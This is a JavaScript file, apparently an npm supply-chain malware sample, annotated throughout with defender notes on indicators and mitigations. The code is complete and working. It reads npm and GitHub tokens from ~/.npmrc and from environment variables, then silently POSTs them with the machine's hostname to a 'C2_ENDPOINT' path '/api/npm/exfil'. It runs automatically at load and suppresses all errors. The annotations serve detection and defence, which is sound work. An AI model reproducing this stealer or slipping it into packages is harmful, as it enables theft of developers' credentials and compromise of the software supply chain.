const https = require('https');
|
|
const http = require('http');
|
|
const { execSync } = require('child_process');
|
|
const fs = require('fs');
|
|
const os = require('os');
|
|
const path = require('path');
|
|
|
|
// Base URL that exfiltrate() posts the collected data to (it appends
// '/api/npm/exfil'). In this copy it is a loopback address, so the request
// goes to a listener on the same machine.
// Defender note: this string and the '/api/npm/exfil' path are the two static
// network indicators in the file; both are plain literals and easy to match in
// package-content scanning.
const C2_ENDPOINT = 'http://localhost:8081';
|
|
// Not referenced by any other visible line of this file.
const EXFIL_TARGET = 'github';
|
|
|
|
/**
 * Collects credentials available to the current user and returns them as a list.
 *
 * Sources read by the visible code:
 *   - `_authToken` entries in `.npmrc` under the user's home directory
 *   - the NPM_TOKEN, GH_TOKEN and GITHUB_TOKEN environment variables
 *
 * Defender notes: package code has no legitimate need to read another tool's
 * credential file. A `node` process that opens `~/.npmrc` and then makes an
 * outbound HTTP POST is the behaviour to alert on. Any token that was present
 * in these locations when this code ran should be treated as disclosed:
 * revoke and reissue it, and review what it was used for afterwards.
 * Keeping long-lived tokens out of the environment of dependency-install
 * steps, and using narrowly scoped, short-lived tokens, limits what a script
 * like this can reach.
 *
 * @returns {Array<{type: string, value: string}>} one entry per credential found;
 *   empty when nothing was found.
 */
function harvestTokens() {
|
|
const tokens = [];
|
|
const home = os.homedir();
|
|
|
|
// Read the per-user npm config, if it exists, and pull out every
// `_authToken = <value>` assignment.
|
|
const npmrcPath = path.join(home, '.npmrc');
|
|
if (fs.existsSync(npmrcPath)) {
|
|
const content = fs.readFileSync(npmrcPath, 'utf8');
|
|
// Global match: `matches` is an array of whole `_authToken=...` strings,
// or null when the file has no such line.
const matches = content.match(/_authToken\s*=\s*([^\s]+)/g);
|
|
if (matches) {
|
|
// Each match is recorded with type 'npm'; the value is the segment that
// follows the '=' sign, trimmed.
tokens.push(...matches.map(m => ({ type: 'npm', value: m.split('=')[1].trim() })));
|
|
}
|
|
}
|
|
|
|
// Environment variables: each one that is set and non-empty is recorded,
// with the lower-cased variable name as its type.
|
|
['NPM_TOKEN', 'GH_TOKEN', 'GITHUB_TOKEN'].forEach(envVar => {
|
|
if (process.env[envVar]) {
|
|
tokens.push({ type: envVar.toLowerCase(), value: process.env[envVar] });
|
|
}
|
|
});
|
|
|
|
return tokens;
|
|
}
|
|
|
|
/**
 * Sends `data` to the endpoint configured in C2_ENDPOINT as a JSON POST.
 *
 * The request body carries three fields: an ISO timestamp, the machine's
 * hostname, and the caller's `data` object. It is sent with the `http` module
 * to the path '/api/npm/exfil', so it travels unencrypted.
 *
 * Defender notes: because the transfer is cleartext HTTP, egress proxies and
 * network sensors can see the path and the JSON body; a POST to
 * '/api/npm/exfil' or a body containing both "hostname" and "tokens" keys is
 * a usable signature for this sample. No response handler is attached and
 * the empty catch discards anything thrown here, so the script prints nothing
 * either way; quiet console output is not evidence that nothing was sent.
 * Restricting outbound network access from build and install environments to
 * the registries they need blocks this step.
 *
 * @param {object} data - value placed under the `data` key of the payload.
 * @returns {undefined}
 */
function exfiltrate(data) {
|
|
try {
|
|
const payload = JSON.stringify({
|
|
timestamp: new Date().toISOString(),
|
|
// Identifies the affected machine to the receiver.
hostname: os.hostname(),
|
|
data: data
|
|
});
|
|
|
|
const url = new URL(C2_ENDPOINT + '/api/npm/exfil');
|
|
const options = {
|
|
hostname: url.hostname,
|
|
// Falls back to 80 only when the URL carries no explicit port.
port: url.port || 80,
|
|
path: url.pathname,
|
|
method: 'POST',
|
|
headers: {
|
|
'Content-Type': 'application/json',
|
|
'Content-Length': Buffer.byteLength(payload)
|
|
}
|
|
};
|
|
|
|
// Request is written and ended without a response callback.
const req = http.request(options);
|
|
req.write(payload);
|
|
req.end();
|
|
// Empty handler: any exception thrown above is discarded without logging.
} catch (e) {}
|
|
}
|
|
|
|
// Main execution: top-level code, so it runs as soon as this file is executed
// or required; no function has to be called by the importing code.
// Defender note: if this file is wired to a package lifecycle hook (not
// visible here), installing the package is enough to trigger it; installing
// with lifecycle scripts disabled (`npm install --ignore-scripts`) prevents
// that path. Review `scripts` entries in package.json for any package that
// ships a file like this.
|
|
try {
|
|
const tokens = harvestTokens();
|
|
// Nothing is sent when no credential was found, so a clean machine shows no
// network activity from this script.
if (tokens.length > 0) {
|
|
exfiltrate({ tokens });
|
|
}
|
|
// Empty handler: failures in collection or sending are discarded without output.
} catch (e) {}
|